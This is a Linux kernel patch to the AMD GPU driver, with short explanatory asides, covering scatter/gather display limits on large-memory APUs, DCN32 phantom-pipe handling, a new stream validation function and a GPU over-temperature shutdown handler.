+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -1333,6 +1333,32 @@ bool amdgpu_device_need_post(struct amdgpu_device *adev)
+ 	return true;
+ }
+ 
++/*
++ * On APUs with >= 64GB of RAM, white flickering has been observed with S/G enabled.
++ * Disable S/G on such systems until we have a proper fix.
++ * https://gitlab.freedesktop.org/drm/amd/-/issues/2354
++ * https://gitlab.freedesktop.org/drm/amd/-/issues/2735
++ */
++bool amdgpu_sg_display_supported(struct amdgpu_device *adev)
++{
++	switch (amdgpu_sg_display) {
++	case -1:
++		break;
++	case 0:
++		return false;
++	case 1:
++		return true;
++	default:
++		return false;
++	}
++	if ((totalram_pages() << (PAGE_SHIFT - 10)) +
++	    (adev->gmc.real_vram_size / 1024) >= 64000000) {
++		DRM_WARN("Disabling S/G due to >=64GB RAM\n");
++		return false;
++	}
++	return true;
++}
++
+ /*
+  * Intel hosts such as Raptor Lake and Sapphire Rapids don't support dynamic
+  * speed switching. Until we have confirmation from Intel that a specific host
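
The threshold arithmetic in amdgpu_sg_display_supported() compares both sides in KiB: totalram_pages() << (PAGE_SHIFT - 10) converts the page count to KiB (a shift by 2 with 4 KiB pages), real_vram_size / 1024 converts the VRAM carve-out from bytes to KiB, and the 64000000 KiB cutoff sits a little below a true 64 GiB (67,108,864 KiB), at roughly 61 GiB. Worked through for a 64 GiB APU with a 512 MiB carve-out: 16,777,216 pages << 2 = 67,108,864 KiB, plus 524,288 KiB of VRAM, exceeds the threshold, so S/G display is disabled.
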
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index 49a023f59b2fc..6e5bc74846952 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -185,6 +185,7 @@ int amdgpu_num_kcq = -1;
+ int amdgpu_smartshift_bias;
+ int amdgpu_use_xgmi_p2p = 1;
+ int amdgpu_vcnfw_log;
++int amdgpu_sg_display = -1; /* auto */
+ 
+ static void amdgpu_drv_delayed_reset_work_handler(struct work_struct *work);
+ 
+@@ -929,6 +930,16 @@ module_param_named(num_kcq, amdgpu_num_kcq, int, 0444);
+ MODULE_PARM_DESC(vcnfw_log, "Enable vcnfw log(0 = disable (default value), 1 = enable)");
+ module_param_named(vcnfw_log, amdgpu_vcnfw_log, int, 0444);
+ 
++/**
++ * DOC: sg_display (int)
++ * Disable S/G (scatter/gather) display (i.e., display from system memory).
++ * This option is only relevant on APUs. Set this option to 0 to disable
++ * S/G display if you experience flickering or other issues under memory
++ * pressure, and report the issue.
++ */
++MODULE_PARM_DESC(sg_display, "S/G Display (-1 = auto (default), 0 = disable)");
++module_param_named(sg_display, amdgpu_sg_display, int, 0444);
++
+ /**
+  * DOC: smu_pptable_id (int)
+  * Used to override pptable id. id = 0 use VBIOS pptable.
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 86e07cc1d3dcc..9f718b98da1f7 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1634,6 +1634,8 @@ static int amdgpu_dm_init(struct amdgpu_device *adev)
+ 		}
+ 		break;
+ 	}
++	if (init_data.flags.gpu_vm_support)
++		init_data.flags.gpu_vm_support = amdgpu_sg_display_supported(adev);
+ 
+ 	if (init_data.flags.gpu_vm_support)
+ 		adev->mode_info.gpu_vm_support = true;
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 8f9c60ed6f8b8..674ab6d9b31e4 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -1079,6 +1079,7 @@ static void disable_dangling_plane(struct dc *dc, struct dc_state *context)
+ 	struct dc_state *dangling_context = dc_create_state(dc);
+ 	struct dc_state *current_ctx;
+ 	struct pipe_ctx *pipe;
++	struct timing_generator *tg;
+ 
+ 	if (dangling_context == NULL)
+ 		return;
+@@ -1122,6 +1123,7 @@ static void disable_dangling_plane(struct dc *dc, struct dc_state *context)
+ 
+ 		if (should_disable && old_stream) {
+ 			pipe = &dc->current_state->res_ctx.pipe_ctx[i];
++			tg = pipe->stream_res.tg;
+ 			/* When disabling plane for a phantom pipe, we must turn on the
+ 			 * phantom OTG so the disable programming gets the double buffer
+ 			 * update. Otherwise the pipe will be left in a partially disabled
+@@ -1129,7 +1131,8 @@ static void disable_dangling_plane(struct dc *dc, struct dc_state *context)
+ 			 * again for different use.
+ 			 */
+ 			if (old_stream->mall_stream_config.type == SUBVP_PHANTOM) {
+-				pipe->stream_res.tg->funcs->enable_crtc(pipe->stream_res.tg);
++				if (tg->funcs->enable_crtc)
++					tg->funcs->enable_crtc(tg);
+ 			}
+ 			dc_rem_all_planes_for_stream(dc, old_stream, dangling_context);
+ 			disable_all_writeback_pipes_for_stream(dc, old_stream, dangling_context);
+@@ -1146,6 +1149,15 @@ static void disable_dangling_plane(struct dc *dc, struct dc_state *context)
+ 				dc->hwss.interdependent_update_lock(dc, dc->current_state, false);
+ 				dc->hwss.post_unlock_program_front_end(dc, dangling_context);
+ 			}
++			/* We need to put the phantom OTG back into its default (disabled) state or we
++			 * can get corruption when transitioning from one SubVP config to a different one.
++			 * The OTG is set to disable on the falling edge of VUPDATE so the plane disable
++			 * will still get its double buffer update.
++			 */
++			if (old_stream->mall_stream_config.type == SUBVP_PHANTOM) {
++				if (tg->funcs->disable_phantom_crtc)
++					tg->funcs->disable_phantom_crtc(tg);
++			}
+ 		}
+ 	}
+ 
+@@ -1942,6 +1954,9 @@ enum dc_status dc_commit_streams(struct dc *dc,
+ 	struct pipe_ctx *pipe;
+ 	bool handle_exit_odm2to1 = false;
+ 
++	if (dc->ctx->dce_environment == DCE_ENV_VIRTUAL_HW)
++		return res;
++
+ 	if (!streams_changed(dc, streams, stream_count))
+ 		return res;
+ 
+@@ -1984,21 +1999,33 @@ enum dc_status dc_commit_streams(struct dc *dc,
+ 
+ 	dc_resource_state_copy_construct_current(dc, context);
+ 
+-	/*
+-	 * Previous validation was perfomred with fast_validation = true and
+-	 * the full DML state required for hardware programming was skipped.
+-	 *
+-	 * Re-validate here to calculate these parameters / watermarks.
+-	 */
+-	res = dc_validate_global_state(dc, context, false);
++	res = dc_validate_with_context(dc, set, stream_count, context, false);
+ 	if (res != DC_OK) {
+-		DC_LOG_ERROR("DC commit global validation failure: %s (%d)",
+-			     dc_status_to_str(res), res);
+-		return res;
++		BREAK_TO_DEBUGGER();
++		goto fail;
+ 	}
+ 
+ 	res = dc_commit_state_no_check(dc, context);
+ 
++	for (i = 0; i < stream_count; i++) {
++		for (j = 0; j < context->stream_count; j++) {
++			if (streams[i]->stream_id == context->streams[j]->stream_id)
++				streams[i]->out.otg_offset = context->stream_status[j].primary_otg_inst;
++
++			if (dc_is_embedded_signal(streams[i]->signal)) {
++				struct dc_stream_status *status = dc_stream_get_status_from_state(context, streams[i]);
++
++				if (dc->hwss.is_abm_supported)
++					status->is_abm_supported = dc->hwss.is_abm_supported(dc, context, streams[i]);
++				else
++					status->is_abm_supported = true;
++			}
++		}
++	}
++
++fail:
++	dc_release_state(context);
++
+ context_alloc_fail:
+ 
+ 	DC_LOG_DC("%s Finished.\n", __func__);
+@@ -3122,6 +3149,19 @@ static bool update_planes_and_stream_state(struct dc *dc,
+ 
+ 	if (update_type == UPDATE_TYPE_FULL) {
+ 		if (!dc->res_pool->funcs->validate_bandwidth(dc, context, false)) {
++			/* For phantom pipes we remove and create a new set of phantom pipes
++			 * for each full update (because we don't know if we'll need phantom
++			 * pipes until after the first round of validation). However, if validation
++			 * fails we need to keep the existing phantom pipes (because we don't update
++			 * the dc->current_state).
++			 *
++			 * The phantom stream/plane refcount is decremented for validation because
++			 * we assume it'll be removed (the free comes when the dc_state is freed),
++			 * but if validation fails we have to increment back the refcount so it's
++			 * consistent.
++			 */
++			if (dc->res_pool->funcs->retain_phantom_pipes)
++				dc->res_pool->funcs->retain_phantom_pipes(dc, dc->current_state);
+ 			BREAK_TO_DEBUGGER();
+ 			goto fail;
+ 		}
+@@ -3987,6 +4027,18 @@ void dc_commit_updates_for_stream(struct dc *dc,
+ 	struct dc_context *dc_ctx = dc->ctx;
+ 	int i, j;
+ 
++	/* TODO: Since the change to the commit sequence can have a huge impact,
++	 * we decided to only enable it for DCN3x. However, as soon as
++	 * we get more confident about this change we'll need to enable
++	 * the new sequence for all ASICs.
++	 */
++	if (dc->ctx->dce_version >= DCN_VERSION_3_2) {
++		dc_update_planes_and_stream(dc, srf_updates,
++					    surface_count, stream,
++					    stream_update);
++		return;
++	}
++
+ 	stream_status = dc_stream_get_status(stream);
+ 	context = dc->current_state;
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index c2c6c4587a5ce..bbaeb6c567d0d 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -1141,6 +1141,11 @@ static bool detect_link_and_local_sink(struct dc_link *link,
+ 					(link->dpcd_caps.dongle_type !=
+ 							DISPLAY_DONGLE_DP_HDMI_CONVERTER))
+ 				converter_disable_audio = true;
++
++			/* limit link rate to HBR3 for DPIA until we implement USB4 V2 */
++			if (link->ep_type == DISPLAY_ENDPOINT_USB4_DPIA &&
++					link->reported_link_cap.link_rate > LINK_RATE_HIGH3)
++				link->reported_link_cap.link_rate = LINK_RATE_HIGH3;
+ 			break;
+ 		}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+index a26e52abc9898..66923f51037a3 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+@@ -2616,15 +2616,241 @@ bool dc_resource_is_dsc_encoding_supported(const struct dc *dc)
+ 	return dc->res_pool->res_cap->num_dsc > 0;
+ }
+ 
++static bool planes_changed_for_existing_stream(struct dc_state *context,
++					       struct dc_stream_state *stream,
++					       const struct dc_validation_set set[],
++					       int set_count)
++{
++	int i, j;
++	struct dc_stream_status *stream_status = NULL;
++
++	for (i = 0; i < context->stream_count; i++) {
++		if (context->streams[i] == stream) {
++			stream_status = &context->stream_status[i];
++			break;
++		}
++	}
++
++	if (!stream_status)
++		ASSERT(0);
++
++	for (i = 0; i < set_count; i++)
++		if (set[i].stream == stream)
++			break;
++
++	if (i == set_count)
++		ASSERT(0);
++
++	if (set[i].plane_count != stream_status->plane_count)
++		return true;
++
++	for (j = 0; j < set[i].plane_count; j++)
++		if (set[i].plane_states[j] != stream_status->plane_states[j])
++			return true;
++
++	return false;
++}
++
++/**
++ * dc_validate_with_context - Validate and update the potential new stream in the context object
++ *
++ * @dc: Used to get the current state status
++ * @set: An array of dc_validation_set with all the current streams reference
++ * @set_count: Total of streams
++ * @context: New context
++ * @fast_validate: Enable or disable fast validation
++ *
++ * This function updates the potential new stream in the context object. It
++ * builds separate lists for the added, removed, and unchanged streams. In
++ * particular, if an unchanged stream has a plane that changed, it is
++ * necessary to first remove all planes from that stream. In summary, this
++ * function is responsible for validating the new context.
++ *
++ * Return:
++ * On success, return DC_OK (1); otherwise, return a DC error.
++ */
++enum dc_status dc_validate_with_context(struct dc *dc,
++					const struct dc_validation_set set[],
++					int set_count,
++					struct dc_state *context,
++					bool fast_validate)
++{
++	struct dc_stream_state *unchanged_streams[MAX_PIPES] = { 0 };
++	struct dc_stream_state *del_streams[MAX_PIPES] = { 0 };
++	struct dc_stream_state *add_streams[MAX_PIPES] = { 0 };
++	int old_stream_count = context->stream_count;
++	enum dc_status res = DC_ERROR_UNEXPECTED;
++	int unchanged_streams_count = 0;
++	int del_streams_count = 0;
++	int add_streams_count = 0;
++	bool found = false;
++	int i, j, k;
++
++	DC_LOGGER_INIT(dc->ctx->logger);
++
++	/* First, build a list of streams to be removed from the current context */
++	for (i = 0; i < old_stream_count; i++) {
++		struct dc_stream_state *stream = context->streams[i];
++
++		for (j = 0; j < set_count; j++) {
++			if (stream == set[j].stream) {
++				found = true;
++				break;
++			}
++		}
++
++		if (!found)
++			del_streams[del_streams_count++] = stream;
++
++		found = false;
++	}
++
++	/* Second, build a list of new streams */
++	for (i = 0; i < set_count; i++) {
++		struct dc_stream_state *stream = set[i].stream;
++
++		for (j = 0; j < old_stream_count; j++) {
++			if (stream == context->streams[j]) {
++				found = true;
++				break;
++			}
++		}
++
++		if (!found)
++			add_streams[add_streams_count++] = stream;
++
++		found = false;
++	}
++
++	/* Build a list of unchanged streams, which is necessary for handling
++	 * plane changes such as planes being added, removed, or updated.
++	 */
++	for (i = 0; i < set_count; i++) {
++		/* Check if stream is part of the delete list */
++		for (j = 0; j < del_streams_count; j++) {
++			if (set[i].stream == del_streams[j]) {
++				found = true;
++				break;
++			}
++		}
++
++		if (!found) {
++			/* Check if stream is part of the add list */
++			for (j = 0; j < add_streams_count; j++) {
++				if (set[i].stream == add_streams[j]) {
++					found = true;
++					break;
++				}
++			}
++		}
++
++		if (!found)
++			unchanged_streams[unchanged_streams_count++] = set[i].stream;
++
++		found = false;
++	}
++
++	/* Remove all planes for unchanged streams if planes changed */
++	for (i = 0; i < unchanged_streams_count; i++) {
++		if (planes_changed_for_existing_stream(context,
++						       unchanged_streams[i],
++						       set,
++						       set_count)) {
++			if (!dc_rem_all_planes_for_stream(dc,
++							  unchanged_streams[i],
++							  context)) {
++				res = DC_FAIL_DETACH_SURFACES;
++				goto fail;
++			}
++		}
++	}
++
++	/* Remove all planes for removed streams and then remove the streams */
++	for (i = 0; i < del_streams_count; i++) {
++		/* Need to copy the dwb data from the old stream in order for efc to work */
++		if (del_streams[i]->num_wb_info > 0) {
++			for (j = 0; j < add_streams_count; j++) {
++				if (del_streams[i]->sink == add_streams[j]->sink) {
++					add_streams[j]->num_wb_info = del_streams[i]->num_wb_info;
++					for (k = 0; k < del_streams[i]->num_wb_info; k++)
++						add_streams[j]->writeback_info[k] = del_streams[i]->writeback_info[k];
++				}
++			}
++		}
++
++		if (!dc_rem_all_planes_for_stream(dc, del_streams[i], context)) {
++			res = DC_FAIL_DETACH_SURFACES;
++			goto fail;
++		}
++
++		res = dc_remove_stream_from_ctx(dc, context, del_streams[i]);
++		if (res != DC_OK)
++			goto fail;
++	}
++
++	/* Swap seamless boot stream to pipe 0 (if needed) to ensure pipe_ctx
++	 * matches. This may change in the future if multiple seamless boot
++	 * streams are supported.
++	 */
++	for (i = 0; i < add_streams_count; i++) {
++		mark_seamless_boot_stream(dc, add_streams[i]);
++		if (add_streams[i]->apply_seamless_boot_optimization && i != 0) {
++			struct dc_stream_state *temp = add_streams[0];
++
++			add_streams[0] = add_streams[i];
++			add_streams[i] = temp;
++			break;
++		}
++	}
++
++	/* Add new streams and then add all planes for the new stream */
++	for (i = 0; i < add_streams_count; i++) {
++		calculate_phy_pix_clks(add_streams[i]);
++		res = dc_add_stream_to_ctx(dc, context, add_streams[i]);
++		if (res != DC_OK)
++			goto fail;
++
++		if (!add_all_planes_for_stream(dc, add_streams[i], set, set_count, context)) {
++			res = DC_FAIL_ATTACH_SURFACES;
++			goto fail;
++		}
++	}
++
++	/* Add all planes for unchanged streams if planes changed */
++	for (i = 0; i < unchanged_streams_count; i++) {
++		if (planes_changed_for_existing_stream(context,
++						       unchanged_streams[i],
++						       set,
++						       set_count)) {
++			if (!add_all_planes_for_stream(dc, unchanged_streams[i], set, set_count, context)) {
++				res = DC_FAIL_ATTACH_SURFACES;
++				goto fail;
++			}
++		}
++	}
++
++	res = dc_validate_global_state(dc, context, fast_validate);
++
++fail:
++	if (res != DC_OK)
++		DC_LOG_WARNING("%s:resource validation failed, dc_status:%d\n",
++			       __func__,
++			       res);
++
++	return res;
++}
+ 
+ /**
+- * dc_validate_global_state() - Determine if HW can support a given state
+- * Checks HW resource availability and bandwidth requirement.
++ * dc_validate_global_state() - Determine if hardware can support a given state
++ *
+  * @dc: dc struct for this driver
+  * @new_ctx: state to be validated
+  * @fast_validate: set to true if only yes/no to support matters
+  *
+- * Return: DC_OK if the result can be programmed.  Otherwise, an error code.
++ * Checks hardware resource availability and bandwidth requirement.
++ *
++ * Return:
++ * DC_OK if the result can be programmed. Otherwise, an error code.
+  */
+ enum dc_status dc_validate_global_state(
+ 		struct dc *dc,
+@@ -3757,4 +3983,4 @@ bool dc_resource_acquire_secondary_pipe_for_mpc_odm(
+ 	}
+ 
+ 	return true;
+-}
+\ No newline at end of file
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dc.h b/drivers/gpu/drm/amd/display/dc/dc.h
+index 6409b8d8ff71e..a4540f83aae59 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc.h
++++ b/drivers/gpu/drm/amd/display/dc/dc.h
+@@ -1298,6 +1298,12 @@ enum dc_status dc_validate_plane(struct dc *dc, const struct dc_plane_state *pla
+ 
+ void get_clock_requirements_for_state(struct dc_state *state, struct AsicStateEx *info);
+ 
++enum dc_status dc_validate_with_context(struct dc *dc,
++					const struct dc_validation_set set[],
++					int set_count,
++					struct dc_state *context,
++					bool fast_validate);
++
+ bool dc_set_generic_gpio_for_stereo(bool enable,
+ 		struct gpio_service *gpio_service);
+ 
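
A minimal caller sketch for the newly exported dc_validate_with_context(), mirroring how dc_commit_streams() uses it above; the dc_validation_set fields are the ones this patch reads (stream, plane_states, plane_count), and the surrounding variables are assumed:

struct dc_validation_set set = { 0 };
enum dc_status res;

set.stream = stream;
set.plane_states[0] = plane;
set.plane_count = 1;

/* false = full validation, including the DML state needed for programming */
res = dc_validate_with_context(dc, &set, 1, context, false);
if (res != DC_OK)
	DC_LOG_WARNING("validation failed: %d\n", res);
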
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index a6fde27d13479..3940271189632 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -2284,6 +2284,12 @@ void dcn10_enable_timing_synchronization(
+ 		opp = grouped_pipes[i]->stream_res.opp;
+ 		tg = grouped_pipes[i]->stream_res.tg;
+ 		tg->funcs->get_otg_active_size(tg, &width, &height);
++
++		if (!tg->funcs->is_tg_enabled(tg)) {
++			DC_SYNC_INFO("Skipping timing sync on disabled OTG\n");
++			return;
++		}
++
+ 		if (opp->funcs->opp_program_dpg_dimensions)
+ 			opp->funcs->opp_program_dpg_dimensions(opp, width, 2*(height) + 1);
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_dpp.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_dpp.c
+index e5b7ef7422b83..50dc834046446 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_dpp.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_dpp.c
+@@ -357,8 +357,11 @@ void dpp3_set_cursor_attributes(
+ 	int cur_rom_en = 0;
+ 
+ 	if (color_format == CURSOR_MODE_COLOR_PRE_MULTIPLIED_ALPHA ||
+-		color_format == CURSOR_MODE_COLOR_UN_PRE_MULTIPLIED_ALPHA)
+-		cur_rom_en = 1;
++		color_format == CURSOR_MODE_COLOR_UN_PRE_MULTIPLIED_ALPHA) {
++		if (cursor_attributes->attribute_flags.bits.ENABLE_CURSOR_DEGAMMA) {
++			cur_rom_en = 1;
++		}
++	}
+ 
+ 	REG_UPDATE_3(CURSOR0_CONTROL,
+ 			CUR0_MODE, color_format,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
+index fe941b103de81..a974f86e718a8 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
+@@ -167,6 +167,13 @@ static void optc32_phantom_crtc_post_enable(struct timing_generator *optc)
+ 	REG_WAIT(OTG_CLOCK_CONTROL, OTG_BUSY, 0, 1, 100000);
+ }
+ 
++static void optc32_disable_phantom_otg(struct timing_generator *optc)
++{
++	struct optc *optc1 = DCN10TG_FROM_TG(optc);
++
++	REG_UPDATE(OTG_CONTROL, OTG_MASTER_EN, 0);
++}
++
+ static void optc32_set_odm_bypass(struct timing_generator *optc,
+ 		const struct dc_crtc_timing *dc_crtc_timing)
+ {
+@@ -260,6 +267,7 @@ static struct timing_generator_funcs dcn32_tg_funcs = {
+ 		.enable_crtc = optc32_enable_crtc,
+ 		.disable_crtc = optc32_disable_crtc,
+ 		.phantom_crtc_post_enable = optc32_phantom_crtc_post_enable,
++		.disable_phantom_crtc = optc32_disable_phantom_otg,
+ 		/* used by enable_timing_synchronization. Not need for FPGA */
+ 		.is_counter_moving = optc1_is_counter_moving,
+ 		.get_position = optc1_get_position,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index 814620e6638fd..2b8700b291a45 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -1719,6 +1719,27 @@ static struct dc_stream_state *dcn32_enable_phantom_stream(struct dc *dc,
+ 	return phantom_stream;
+ }
+ 
++void dcn32_retain_phantom_pipes(struct dc *dc, struct dc_state *context)
++{
++	int i;
++	struct dc_plane_state *phantom_plane = NULL;
++	struct dc_stream_state *phantom_stream = NULL;
++
++	for (i = 0; i < dc->res_pool->pipe_count; i++) {
++		struct pipe_ctx *pipe = &context->res_ctx.pipe_ctx[i];
++
++		if (!pipe->top_pipe && !pipe->prev_odm_pipe &&
++				pipe->plane_state && pipe->stream &&
++				pipe->stream->mall_stream_config.type == SUBVP_PHANTOM) {
++			phantom_plane = pipe->plane_state;
++			phantom_stream = pipe->stream;
++
++			dc_plane_state_retain(phantom_plane);
++			dc_stream_retain(phantom_stream);
++		}
++	}
++}
++
+ // return true if removed piped from ctx, false otherwise
+ bool dcn32_remove_phantom_pipes(struct dc *dc, struct dc_state *context)
+ {
+@@ -2035,6 +2056,7 @@ static struct resource_funcs dcn32_res_pool_funcs = {
+ 	.update_soc_for_wm_a = dcn30_update_soc_for_wm_a,
+ 	.add_phantom_pipes = dcn32_add_phantom_pipes,
+ 	.remove_phantom_pipes = dcn32_remove_phantom_pipes,
++	.retain_phantom_pipes = dcn32_retain_phantom_pipes,
+ };
+ 
+ static uint32_t read_pipe_fuses(struct dc_context *ctx)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
+index 615244a1f95d5..026cf13d203fc 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
+@@ -83,6 +83,9 @@ bool dcn32_release_post_bldn_3dlut(
+ bool dcn32_remove_phantom_pipes(struct dc *dc,
+ 		struct dc_state *context);
+ 
++void dcn32_retain_phantom_pipes(struct dc *dc,
++		struct dc_state *context);
++
+ void dcn32_add_phantom_pipes(struct dc *dc,
+ 		struct dc_state *context,
+ 		display_e2e_pipe_params_st *pipes,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+index 213ff3672bd54..aed92ced7b762 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+@@ -1619,6 +1619,7 @@ static struct resource_funcs dcn321_res_pool_funcs = {
+ 	.update_soc_for_wm_a = dcn30_update_soc_for_wm_a,
+ 	.add_phantom_pipes = dcn32_add_phantom_pipes,
+ 	.remove_phantom_pipes = dcn32_remove_phantom_pipes,
++	.retain_phantom_pipes = dcn32_retain_phantom_pipes,
+ };
+ 
+ static uint32_t read_pipe_fuses(struct dc_context *ctx)
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/core_types.h b/drivers/gpu/drm/amd/display/dc/inc/core_types.h
+index 9498105c98ab3..5fa7c4772af4f 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/core_types.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/core_types.h
+@@ -234,6 +234,7 @@ struct resource_funcs {
+             unsigned int index);
+ 
+ 	bool (*remove_phantom_pipes)(struct dc *dc, struct dc_state *context);
++	void (*retain_phantom_pipes)(struct dc *dc, struct dc_state *context);
+ 	void (*get_panel_config_defaults)(struct dc_panel_config *panel_config);
+ };
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h b/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
+index f96fb425345e4..789cf9406ca5b 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
+@@ -185,6 +185,7 @@ struct timing_generator_funcs {
+ #ifdef CONFIG_DRM_AMD_DC_DCN
+ 	void (*phantom_crtc_post_enable)(struct timing_generator *tg);
+ #endif
++	void (*disable_phantom_crtc)(struct timing_generator *tg);
+ 	bool (*immediate_disable_crtc)(struct timing_generator *tg);
+ 	bool (*is_counter_moving)(struct timing_generator *tg);
+ 	void (*get_position)(struct timing_generator *tg,
+diff --git a/drivers/gpu/drm/amd/include/kgd_pp_interface.h b/drivers/gpu/drm/amd/include/kgd_pp_interface.h
+index d18162e9ed1da..f3d64c78feaa8 100644
+--- a/drivers/gpu/drm/amd/include/kgd_pp_interface.h
++++ b/drivers/gpu/drm/amd/include/kgd_pp_interface.h
+@@ -139,6 +139,8 @@ enum amd_pp_sensors {
+ 	AMDGPU_PP_SENSOR_MIN_FAN_RPM,
+ 	AMDGPU_PP_SENSOR_MAX_FAN_RPM,
+ 	AMDGPU_PP_SENSOR_VCN_POWER_STATE,
++	AMDGPU_PP_SENSOR_PEAK_PSTATE_SCLK,
++	AMDGPU_PP_SENSOR_PEAK_PSTATE_MCLK,
+ };
+ 
+ enum amd_pp_task {
+diff --git a/drivers/gpu/drm/amd/pm/inc/amdgpu_dpm.h b/drivers/gpu/drm/amd/pm/inc/amdgpu_dpm.h
+index cb5b9df78b4db..338fce249f5ab 100644
+--- a/drivers/gpu/drm/amd/pm/inc/amdgpu_dpm.h
++++ b/drivers/gpu/drm/amd/pm/inc/amdgpu_dpm.h
+@@ -89,6 +89,8 @@ struct amdgpu_dpm_thermal {
+ 	int                max_mem_crit_temp;
+ 	/* memory max emergency(shutdown) temp */
+ 	int                max_mem_emergency_temp;
++	/* SWCTF threshold */
++	int                sw_ctf_threshold;
+ 	/* was last interrupt low to high or high to low */
+ 	bool               high_to_low;
+ 	/* interrupt source */
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c b/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
+index 1159ae114dd02..179e1c593a53f 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
+@@ -26,6 +26,7 @@
+ #include <linux/gfp.h>
+ #include <linux/slab.h>
+ #include <linux/firmware.h>
++#include <linux/reboot.h>
+ #include "amd_shared.h"
+ #include "amd_powerplay.h"
+ #include "power_state.h"
+@@ -91,6 +92,45 @@ static int pp_early_init(void *handle)
+ 	return 0;
+ }
+ 
++static void pp_swctf_delayed_work_handler(struct work_struct *work)
++{
++	struct pp_hwmgr *hwmgr =
++		container_of(work, struct pp_hwmgr, swctf_delayed_work.work);
++	struct amdgpu_device *adev = hwmgr->adev;
++	struct amdgpu_dpm_thermal *range =
++				&adev->pm.dpm.thermal;
++	uint32_t gpu_temperature, size;
++	int ret;
++
++	/*
++	 * If the hotspot/edge temperature is confirmed to be below the SW CTF set
++	 * point after the enforced delay, nothing will be done.
++	 * Otherwise, a graceful shutdown will be performed to prevent further damage.
++	 */
++	if (range->sw_ctf_threshold &&
++	    hwmgr->hwmgr_func->read_sensor) {
++		ret = hwmgr->hwmgr_func->read_sensor(hwmgr,
++						     AMDGPU_PP_SENSOR_HOTSPOT_TEMP,
++						     &gpu_temperature,
++						     &size);
++		/*
++		 * For some legacy ASICs, hotspot temperature retrieving might be not
++		 * supported. Check the edge temperature instead then.
++		 */
++		if (ret == -EOPNOTSUPP)
++			ret = hwmgr->hwmgr_func->read_sensor(hwmgr,
++							     AMDGPU_PP_SENSOR_EDGE_TEMP,
++							     &gpu_temperature,
++							     &size);
++		if (!ret && gpu_temperature / 1000 < range->sw_ctf_threshold)
++			return;
++	}
++
++	dev_emerg(adev->dev, "ERROR: GPU over temperature range(SW CTF) detected!\n");
++	dev_emerg(adev->dev, "ERROR: System is going to shutdown due to GPU SW CTF!\n");
++	orderly_poweroff(true);
++}
++
+ static int pp_sw_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = handle;
+@@ -101,6 +141,10 @@ static int pp_sw_init(void *handle)
+ 
+ 	pr_debug("powerplay sw init %s\n", ret ? "failed" : "successfully");
+ 
